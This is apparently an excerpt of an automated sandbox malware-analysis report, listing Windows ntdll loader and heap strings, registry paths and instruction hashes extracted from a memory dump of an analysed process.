                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 2CDCCD34
                                                                  • @, xrefs: 2CDCCD63
                                                                  • InstallLanguageFallback, xrefs: 2CDCCD7F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                  • API String ID: 0-1757540487
                                                                  Strings
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 2CE482DE
                                                                  • Failed to reallocate the system dirs string !, xrefs: 2CE482D7
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE482E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 2CE54888
                                                                  • LdrpCheckRedirection, xrefs: 2CE5488F
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 2CE54899
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 2CE520FA
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 2CE520F3
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE52104
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 2CE5CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @
                                                                  Strings
                                                                  • LdrResSearchResource Exit, xrefs: 2CDDAA25
                                                                  • LdrResSearchResource Enter, xrefs: 2CDDAA13
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  Strings
                                                                  • , xrefs: 2CE732B8
                                                                  • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 2CE73011
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  Strings
                                                                  • LdrpResGetMappingSize Enter, xrefs: 2CDDAC6A
                                                                  • LdrpResGetMappingSize Exit, xrefs: 2CDDAC7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2CDD063D
                                                                  • kLsE, xrefs: 2CDD0540
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  Strings
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2CE4280C
                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 2CE42807
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 2CE11025
                                                                  • @, xrefs: 2CE11050
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PATH
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: w
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \,
                                                                  • API String ID: 0-2448794073
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Ph,
                                                                  • API String ID: 0-933478797
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AlternateCodePage
                                                                  • API String ID: 0-3889302423
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \,
                                                                  • API String ID: 0-2448794073
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pf,
                                                                  • API String ID: 0-2403302106
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @3,
                                                                  • API String ID: 0-2075540940
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 0-565535830
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  Strings
                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2CE6AF2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                  • API String ID: 0-1911121157
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WindowsExcludedProcs
                                                                  • API String ID: 0-3583428290
                                                                  Strings
                                                                  • Critical error detected %lx, xrefs: 2CE87027
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Critical error detected %lx
                                                                  • API String ID: 0-802127002
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2CE5895E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56187ddc90a505c0620c63536fedf28a1ba81ad76aeaf2bccb7ae2ac366583a9
                                                                  • Instruction ID: 911e5b595a3bac2704231acc1d96dc6a2be768481af01bb32002c80b07795501
                                                                  • Opcode Fuzzy Hash: 56187ddc90a505c0620c63536fedf28a1ba81ad76aeaf2bccb7ae2ac366583a9
                                                                  • Instruction Fuzzy Hash: 0A328C76A05205CFCB14CF69C880BAAB7F5FF48304F218A6DE955AB361D734E946CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction ID: d5c17bfb280d6a360a682e4f0e36cf121e8635c93578a430b54866bff3ad5819
                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction Fuzzy Hash: 63F18C71E0520A9BCB04CFA5D990BEEB7F5BF48704F16816DE905AB360E734E981CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afffd1a554939fa3554149fb80b8c9c9356588670f1622e9ea29b0958a95f586
                                                                  • Instruction ID: 264329bd9b0d3d9928610faca8f06be786e7c6cfaabd4be7d988ac38db7bc1f4
                                                                  • Opcode Fuzzy Hash: afffd1a554939fa3554149fb80b8c9c9356588670f1622e9ea29b0958a95f586
                                                                  • Instruction Fuzzy Hash: 26D12571E5060A8BDB25CF69C841BEEB7F1BF88308F248269D865E7641E735DA05CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b902767f5f5220c2e4c7b71642dc79227c772165d917b470d1443d427f4e70f2
                                                                  • Instruction ID: c98f1b6f6bfaa95e970d6fb2aed958fe76e0918a0d0f301d218749de344dabd6
                                                                  • Opcode Fuzzy Hash: b902767f5f5220c2e4c7b71642dc79227c772165d917b470d1443d427f4e70f2
                                                                  • Instruction Fuzzy Hash: 5BE18F76909342DFC304CF29C490A5ABBE0FF89314F168A6DF99987361D731E94ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b32d34a5e9a6085869936967710299bbd057d1294cc4e5f5945487f27613166
                                                                  • Instruction ID: 966eee40ab824b57e8ac36916c4df0e4eca0b8715e2cd981807dfe5905a7d45a
                                                                  • Opcode Fuzzy Hash: 1b32d34a5e9a6085869936967710299bbd057d1294cc4e5f5945487f27613166
                                                                  • Instruction Fuzzy Hash: BCE162B0D5425ADFCB04CFA9C481AEEBBF5BF49304F248159E844E7641E735DA85CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df20c7343e1a58152ce89a774f564b1d177a76c75bc2e2338ebdacf512e5beca
                                                                  • Instruction ID: 17d60b64ddc1b13f92e5c16c50b4ecfb5f03cb5abce30cbfc30e48d1d2874f4d
                                                                  • Opcode Fuzzy Hash: df20c7343e1a58152ce89a774f564b1d177a76c75bc2e2338ebdacf512e5beca
                                                                  • Instruction Fuzzy Hash: 2BE1F271D04608DFCB21CFAAC980A9DBBF5FF48314F21456EE946A7261D772AA85CF10
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a21170b1ec932baa646811069fe2cf27bd8356895a4269ce5dc77619c5cc7ca
                                                                  • Instruction ID: 286f2291a1ecfe30b438cb74a644115fece91bd1f98d3019fd740f7065eb546c
                                                                  • Opcode Fuzzy Hash: 5a21170b1ec932baa646811069fe2cf27bd8356895a4269ce5dc77619c5cc7ca
                                                                  • Instruction Fuzzy Hash: 33D1B031B053298FEB20CF25C890B9AB7B5BF55304F1441ADD90DA72A1DF34AE85CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction ID: 8db002fc9ee7b723759a7212bd8e56ff038538add2d69da22df215cd5b384fed
                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction Fuzzy Hash: ECB13531605646AFDB11CB64C840FBEBBFAAF84304F644199D9599B3A1DB30FE81DB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5900cb7b31753d7aaa6544c30d8b97bb414bd5d3430d6507992a22504295437
                                                                  • Instruction ID: 9aea55289fae8ba0988e3a7d5c28b32b23569b820f56a21a89a08361a4c136ec
                                                                  • Opcode Fuzzy Hash: b5900cb7b31753d7aaa6544c30d8b97bb414bd5d3430d6507992a22504295437
                                                                  • Instruction Fuzzy Hash: B1C18970E05249DFDB14CFA8C980EAEBBB9FF58304F11412EE505AB265D734AA85CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 411376d32c21c4533c140bf39fa160fea29d345b0d90f81ba0dac1fc4bdfe81d
                                                                  • Instruction ID: 9420da764286ed39739f579476bfcb4386a737a683296226b031afea711145af
                                                                  • Opcode Fuzzy Hash: 411376d32c21c4533c140bf39fa160fea29d345b0d90f81ba0dac1fc4bdfe81d
                                                                  • Instruction Fuzzy Hash: A9B18070B146558BDB24CF64C880BA9B3B5EF84700F1089EDD64AE7261EB709EC5CF21
                                                                  Memory Dump Source
